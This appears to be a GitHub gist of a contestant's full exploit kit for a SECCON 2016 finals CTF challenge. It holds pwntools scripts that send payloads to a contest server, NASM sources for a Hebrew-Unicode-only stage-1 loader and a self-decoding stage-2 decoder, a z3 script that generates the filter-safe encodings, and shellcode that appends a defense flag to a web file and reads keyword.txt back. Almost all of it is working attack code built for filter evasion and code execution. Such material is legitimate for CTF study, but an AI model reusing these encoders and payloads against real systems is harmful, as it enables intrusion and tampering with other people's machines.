@rekkusu
Last active February 5, 2017 13:46
[SECCON 2016 Finals] Server 5: Hebrew Shellcode
def encode(code):
    """Nibble-encode *code* for the stage-2 decoder.

    Every input byte becomes four output bytes: the high nibble plus 0xD0,
    then 0x05, then the low nibble plus 0xD0, then 0x05. So every output byte
    is either in 0xD0..0xDF or is 0x05.

    Args:
        code: byte string to encode (each element goes through ord()).

    Returns:
        A str four times the length of *code*.
    """
    pieces = [
        chr(0xD0 + (c >> 4 & 0x0F)) + '\x05' + chr(0xD0 + (c & 0x0F)) + '\x05'
        for c in map(ord, code)
    ]
    return ''.join(pieces)
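# Byte budget of stage 1 (buffer + stub + encoded decoder + glue + padding);
# the nibble-encoded shellcode starts right after it.  3184 = 0xC70.
STAGE_LEN = 3184

# 'buffer': the assembled (cdq; add eax, imm32) chain, net effect eax += 0xc40.
with open('buffer', 'rb') as f:
    buffer = f.read()
# 'decoder': the assembled stage-2 decoder in its encoded form (the generated listing).
with open('decoder', 'rb') as f:
    decoder = f.read()

payload = ""
payload += buffer # add eax, 0xc40
# NOTE(review): the next three instructions look like filler (the stage-2
# decoder re-zeroes ebx); only the xchg is needed to move eax+0xc40 into edi -- confirm.
payload += '\x21\xfb' # and ebx, edi
payload += '\xb7\x05' # mov bh, 0x5
payload += '\x31\xfb' # xor ebx, edi
payload += '\x97' # xchg eax, edi
payload += decoder
payload += '\x05\x2c\xfb\x30\xfb' # glue (aa 05): add eax, 0xfb30fb2c; its leading 05 pairs with the decoder's final stosb (aa)

pad_len = STAGE_LEN - len(payload)
if pad_len < 0:
    # Previously an oversized stage 1 was silently sent with no padding.
    raise ValueError('stage 1 exceeds %d bytes by %d' % (STAGE_LEN, -pad_len))
# 2c fb = `sub al, 0xfb`; an odd pad_len leaves stage 1 one byte short of STAGE_LEN.
payload += '\x2c\xfb' * (pad_len // 2) # padding

with open('flag', 'rb') as f:
    payload += encode(f.read()) # shellcode, nibble-encoded for the stage-2 decoder

from pwn import *  # star import kept where the author placed it; it provides remote()
s = remote('5.finals.seccon.jp', 12345)
s.send(payload + '\n')
s.interactive()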
BITS 32
; Stage-1 "buffer": 161 (cdq ; add eax, imm32) pairs.  Summed modulo 2^32 the
; immediates come to exactly 0x00000c40, so the net effect is eax += 0xc40
; (the payload script labels this file `add eax, 0xc40`); cdq clobbers edx.
; Every 16-bit little-endian unit of the assembled bytes (99 05 = 0x0599 from
; cdq plus add's opcode, then the two halves of each immediate) is a code point
; in the Unicode Hebrew blocks -- presumably the filter the challenge applies;
; the server side is not on this page.
%rep 6
    cdq
    add eax, 0xfb20fb30
%endrep
%rep 16
    cdq
    add eax, 0xfb2005d0
%endrep
%rep 29
    cdq
    add eax, 0xfb2005e0
%endrep
%rep 17
    cdq
    add eax, 0xfb30fb20
%endrep
%rep 2
    cdq
    add eax, 0xfb3005d0
%endrep
%rep 18
    cdq
    add eax, 0xfb3005e0
%endrep
%rep 22
    cdq
    add eax, 0x5d0fb30
%endrep
%rep 17
    cdq
    add eax, 0x5d005e0
%endrep
%rep 18
    cdq
    add eax, 0x5e0fb20
%endrep
%rep 16
    cdq
    add eax, 0x5e005d0
%endrep
BITS 32
; Generated by the search()/generator script on this page: one emit_byte group
; per byte of the stage-2 decoder (48 groups, consistent with the 48 bytes that
; decoder assembles to).  A group adds the listed code units into eax with the
; high half fixed at 0xfb30 (only the low byte of the running sum matters),
; with cdq between the adds, then stosb stores al and advances edi.  Each
; group's low-byte sum, starting from the byte stored by the previous group,
; is the next decoder byte (the first two groups give 0xeb 0x29 = `jmp +0x29`,
; the decoder's `jmp tail`).
%macro emit_byte 1-*
    add eax, 0xfb300000 | %1
    %rotate 1
    %rep %0 - 1
        cdq
        add eax, 0xfb300000 | %1
        %rotate 1
    %endrep
    stosb
%endmacro

emit_byte 0xfb2e, 0xfb2f, 0x05d8, 0x05da, 0x05dc
emit_byte 0xfb25, 0xfb2d, 0xfb2f, 0x05de, 0x05df
emit_byte 0x05d0, 0x05d6, 0x05d6, 0x05d7, 0x05dc
emit_byte 0xfb25, 0xfb2f, 0xfb2f, 0x05d7, 0x05d7
emit_byte 0x05d4, 0x05d4, 0x05d7, 0x05df, 0x05df
emit_byte 0xfb23, 0xfb23, 0x05d1, 0x05d5, 0x05d7
emit_byte 0xfb25, 0xfb2d, 0xfb2f, 0x05de, 0x05df
emit_byte 0xfb20, 0xfb26, 0xfb27, 0xfb2b, 0x05d2
emit_byte 0xfb2e, 0x05d0, 0x05d5, 0x05d7
emit_byte 0xfb24, 0xfb2a, 0xfb2a, 0x05de
emit_byte 0xfb2d, 0x05d4, 0x05db, 0x05de, 0x05de
emit_byte 0xfb2b, 0xfb2b, 0x05dd, 0x05df, 0x05df
emit_byte 0x05d1, 0x05d1, 0x05d1, 0x05d3
emit_byte 0xfb2a, 0xfb2b, 0x05d7, 0x05d7
emit_byte 0xfb28, 0xfb2a, 0x05d0, 0x05db
emit_byte 0xfb21, 0xfb21, 0x05df, 0x05df
emit_byte 0xfb2b, 0x05d5, 0x05d5, 0x05dd, 0x05de
emit_byte 0xfb2c, 0xfb2e, 0x05d0, 0x05d0
emit_byte 0xfb23, 0x05d9, 0x05da, 0x05df, 0x05df
emit_byte 0xfb24, 0xfb28, 0xfb2b, 0xfb2b
emit_byte 0xfb2a, 0xfb2a, 0xfb2d, 0x05d0, 0x05d2
emit_byte 0xfb22, 0xfb2f, 0xfb2f, 0x05d0, 0x05d1
emit_byte 0xfb2b, 0xfb2c, 0xfb2d, 0x05df, 0x05df
emit_byte 0xfb21, 0xfb21, 0x05df, 0x05df
emit_byte 0xfb20, 0xfb21, 0xfb2e, 0x05d5
emit_byte 0xfb27, 0x05d1, 0x05d4, 0x05da, 0x05de
emit_byte 0xfb27, 0xfb2a, 0xfb2f, 0x05da, 0x05de
emit_byte 0xfb21, 0xfb21, 0x05df, 0x05df
emit_byte 0x05d4, 0x05d4, 0x05d7, 0x05df, 0x05df
emit_byte 0x05d0, 0x05d1, 0x05de, 0x05df
emit_byte 0x05d0, 0x05d0, 0x05d2, 0x05de, 0x05de
emit_byte 0xfb2d, 0xfb2e, 0x05dc, 0x05dd, 0x05de
emit_byte 0xfb26, 0xfb2f, 0x05d1, 0x05d2, 0x05d2
emit_byte 0xfb2a, 0x05d9, 0x05dc, 0x05de
emit_byte 0xfb2b, 0x05d5, 0x05da, 0x05de, 0x05df
emit_byte 0xfb21, 0xfb2e, 0xfb2e, 0x05d4, 0x05d7
emit_byte 0xfb21, 0xfb2a, 0x05dc, 0x05dc
emit_byte 0x05d1, 0x05d9, 0x05d9, 0x05db, 0x05dd
emit_byte 0x05d8, 0x05da, 0x05de, 0x05de, 0x05df
emit_byte 0xfb24, 0xfb28, 0xfb2b, 0xfb2b
emit_byte 0xfb2c, 0x05d3, 0x05d8, 0x05de, 0x05de
emit_byte 0xfb28, 0xfb2a, 0x05d4, 0x05df, 0x05df
emit_byte 0xfb26, 0xfb26, 0x05d5, 0x05da
emit_byte 0xfb2c, 0xfb2e, 0x05d0, 0x05d8
emit_byte 0xfb28, 0xfb2b, 0x05dc, 0x05dc, 0x05df
emit_byte 0x05d2, 0x05d6, 0x05d6, 0x05d7, 0x05d8
emit_byte 0xfb21, 0xfb21, 0x05df, 0x05df
emit_byte 0xfb2f, 0xfb2f, 0x05d0, 0x05d2
from z3 import *
# 16-bit code units the decoder's `add` immediates may be built from: the
# Hebrew presentation-form range 0xfb20..0xfb2f with 0xfb29 left out (the page
# does not say why; presumably the target's filter rejects it) and the Hebrew
# letter range 0x05d0..0x05df.
valid = [u for u in range(0xfb20, 0xfb30) if u != 0xfb29] + list(range(0x05d0, 0x05e0))
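def search(ch, start=0):
    """Find a short multiset of ``valid`` units whose low-byte sum hits *ch*.

    Models a chain of ``add eax, 0xfb30XXXX``: starting from *start* (the low
    byte left in eax by the previous group), look for one to five entries of
    ``valid`` (each used at most three times) whose low bytes add up, modulo
    256, to *ch*.  Only the low byte is modelled because carries never flow
    back down into it.

    Args:
        ch: target byte value, 0..255.
        start: low byte of eax before the first add (default 0).

    Returns:
        A list of ``valid`` entries, one per ``add`` to emit, in ``valid`` order.

    Raises:
        ValueError: if *ch* is out of range or no combination exists (the
            original used ``assert`` for both, which ``python -O`` strips).
    """
    if not 0 <= ch <= 0xFF:
        raise ValueError('ch must be a byte value 0..255, got %r' % (ch,))
    counts = [BitVec('x%02d' % i, 32) for i in range(len(valid))]
    total = BitVecVal(start, 32)
    for unit, count in zip(valid, counts):
        total += unit * count & 0xFF
    solver = Solver()
    solver.add(total & 0xFF == ch)
    used = 0
    for count in counts:
        solver.add(And(count >= 0, count <= 3))
        used += count
    solver.add(And(used > 0, used < 6))
    if solver.check() != sat:
        raise ValueError('no add chain reaches 0x%02x from 0x%02x' % (ch, start))
    model = solver.model()
    result = []
    for unit, count in zip(valid, counts):
        # model_completion fills in any variable the solver left unassigned
        # instead of returning None (which the original would have crashed on).
        n = model.eval(count, model_completion=True).as_long()
        result.extend([unit] * n)
    return result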
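# Emit NASM for the stage-2 decoder, one (add ... cdq ... add, stosb) group per
# byte of 'decoder_sc', using search() to pick immediates the target accepts.
with open('decoder_sc', 'rb') as f:
    decoder = f.read()
chunks = ['BITS 32\n']
start = 0x00
for c in map(ord, decoder):
    r = search(c, start)
    # One add per chosen unit, cdq between adds, then stosb stores the low byte.
    parts = []
    for a in r:
        if parts:
            parts.append('cdq\n')
        parts.append('add eax, 0xfb30%04x\n' % a)
    parts.append('stosb\n')
    parts.append('\n')
    chunks.append(''.join(parts))
    # The next group starts from the byte just stored (eax's low byte is c).
    start = c
asm = ''.join(chunks)
print(asm)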
BITS 32
; Stage-2 decoder (its assembled bytes are what the generated add/stosb listing
; on this page reproduces).  Undoes encode(): every output byte is rebuilt from
; two 0xD0+nibble bytes that sit two bytes apart, skipping the 0x05 bytes that
; encode() interleaves.  Decodes in place, then falls through into the result.
jmp tail
start:
pop eax            ; return address pushed by `call start` = address of tail2
mov esi, eax       ; read cursor: the encoded data starts right after this code
mov edi, eax       ; write cursor: decoded bytes overwrite the encoded ones in place
xor ebx, ebx
xor ecx, ecx
mov edx, 0x300     ; iterations: 0x300 output bytes consume 0xC00 input bytes
nop                ; presumably size padding (brings the decoder to 48 bytes) -- TODO confirm
loop:
mov bl, byte [esi] ; 0xD0 + high nibble
shl bl, 4          ; the 0xD0 part shifts out of bl, leaving hi << 4
inc esi
inc esi            ; skip the 0x05 filler byte
mov cl, byte [esi] ; 0xD0 + low nibble
inc esi
inc esi
and ecx, 0x0f      ; keep only the low nibble
add ebx, ecx       ; bl = (hi << 4) | lo  (no carry, so ebx's upper bytes stay 0)
mov byte [edi], bl
inc edi
dec edx
test edx, edx
je tail2           ; after 0x300 bytes execution continues at tail2, now holding decoded bytes
jmp loop
tail:
call start         ; pushes the address of tail2 so start can recover it
tail2:
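def get_flag():
    """Read the current defense flag from the local 'flagword' file.

    Returns:
        The file's contents exactly as read (no stripping), after echoing
        them to stdout.

    Raises:
        IOError/OSError: if 'flagword' cannot be opened.
    """
    # `with` closes the handle; the original leaked it and imported an unused os.
    with open('flagword', 'r') as f:
        flag = f.read()
    print('Defense flag: %s' % flag)
    return flag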
def encode(code):
    """Nibble-encode *code* for the stage-2 decoder.

    Every input byte becomes four output bytes: the high nibble plus 0xD0,
    then 0x05, then the low nibble plus 0xD0, then 0x05. So every output byte
    is either in 0xD0..0xDF or is 0x05.

    Args:
        code: byte string to encode (each element goes through ord()).

    Returns:
        A str four times the length of *code*.
    """
    pieces = [
        chr(0xD0 + (c >> 4 & 0x0F)) + '\x05' + chr(0xD0 + (c & 0x0F)) + '\x05'
        for c in map(ord, code)
    ]
    return ''.join(pieces)
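# Byte budget of stage 1 (buffer + stub + encoded decoder + glue + padding);
# the nibble-encoded shellcode starts right after it.  3184 = 0xC70.
STAGE_LEN = 3184

# 'buffer': the assembled (cdq; add eax, imm32) chain, net effect eax += 0xc40.
with open('buffer', 'rb') as f:
    buffer = f.read()
# 'decoder': the assembled stage-2 decoder in its encoded form (the generated listing).
with open('decoder', 'rb') as f:
    decoder = f.read()
# 'defense': assembled defense-flag shellcode (presumably the listing on this page).
with open('defense', 'rb') as f:
    defense = f.read()

payload = ""
payload += buffer # add eax, 0xc40
payload += '\x21\xfb' # and ebx, edi
payload += '\xb7\x05' # mov bh, 0x5
payload += '\x31\xfb' # xor ebx, edi
payload += '\x97' # xchg eax, edi
payload += decoder
payload += '\x05\x2c\xfb\x30\xfb' # glue (aa 05): add eax, 0xfb30fb2c; its leading 05 pairs with the decoder's final stosb (aa)

pad_len = STAGE_LEN - len(payload)
if pad_len < 0:
    # Previously an oversized stage 1 was silently sent with no padding.
    raise ValueError('stage 1 exceeds %d bytes by %d' % (STAGE_LEN, -pad_len))
# 2c fb = `sub al, 0xfb`; an odd pad_len leaves stage 1 one byte short of STAGE_LEN.
payload += '\x2c\xfb' * (pad_len // 2) # padding

# Re-submit once a minute on a fresh connection.  The flag is re-read from
# 'flagword' every round and travels in clear text over the pwntools TCP socket.
while True:
    s = remote('5.finals.seccon.jp', 12345)
    try:
        # Trailer after the shellcode: '\n', the flag, '\n', 8 'A's, 8 NULs;
        # the shellcode's write() covers 0x22 bytes of it.
        pay = payload + encode(defense + '\n' + get_flag() + '\nAAAAAAAA\0\0\0\0\0\0\0\0')
        s.send(pay + '\n')
        print(s.recv(1024))
    finally:
        # Closed even if get_flag()/encode() raise; the original leaked the socket then.
        s.close()
    sleep(60)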
BITS 32
; Defense-flag writer: appends the 0x22 bytes that follow `flag:` to the
; target's defense flag file, then exits.  i386 Linux syscalls via int 0x80.
jmp fname
start:
pop ebx            ; ebx = address of the path string pushed by `call start`
mov ecx, 0x401     ; O_WRONLY | O_APPEND (no O_CREAT: the file must already exist)
mov eax, 5         ; sys_open(path, flags)
int 0x80
mov ebp, eax       ; keep the fd for close(); a negative (error) return is not checked
mov ebx, eax       ; fd for write()
jmp flag
readflag:
pop ecx            ; ecx = address of the data after `call readflag`
mov edx, 0x22      ; 34 bytes; with the payload script's '\n' + flag + '\nAAAAAAAA' trailer that implies a 24-byte flag -- TODO confirm
mov eax, 4         ; sys_write(fd, data, 0x22)
int 0x80
mov ebx, ebp
mov eax, 6         ; sys_close(fd)
int 0x80
mov eax, 1         ; sys_exit
int 0x80
fname:
call start
db '/usr/share/nginx/html/defense/flag.txt', 0
flag:
call readflag      ; the bytes written start immediately after this instruction
BITS 32
; Reads up to 0x60 bytes of 'keyword.txt' into a fixed buffer at 0x804a2a0 and
; writes that buffer to fd 0, then exits.  i386 Linux syscalls via int 0x80.
jmp name
start:
pop ebx            ; ebx = address of "keyword.txt"
xor ecx, ecx       ; flags = O_RDONLY
mov eax, 5         ; sys_open
int 0x80
mov ebx, eax       ; fd; a negative (error) return is not checked
mov ecx, 0x804a2a0 ; fixed buffer address, presumably writable data inside the target binary -- TODO confirm
mov edx, 0x60
mov eax, 3         ; sys_read(fd, 0x804a2a0, 0x60)
int 0x80
xor ebx, ebx       ; fd 0 (presumably the client connection when stdin is the socket -- TODO confirm)
mov eax, 4         ; sys_write(0, buf, 0x60): ecx/edx unchanged, so the full 0x60 is written regardless of read()'s return
int 0x80
mov eax, 1         ; sys_exit
int 0x80
name:
call start
db 'keyword.txt', 0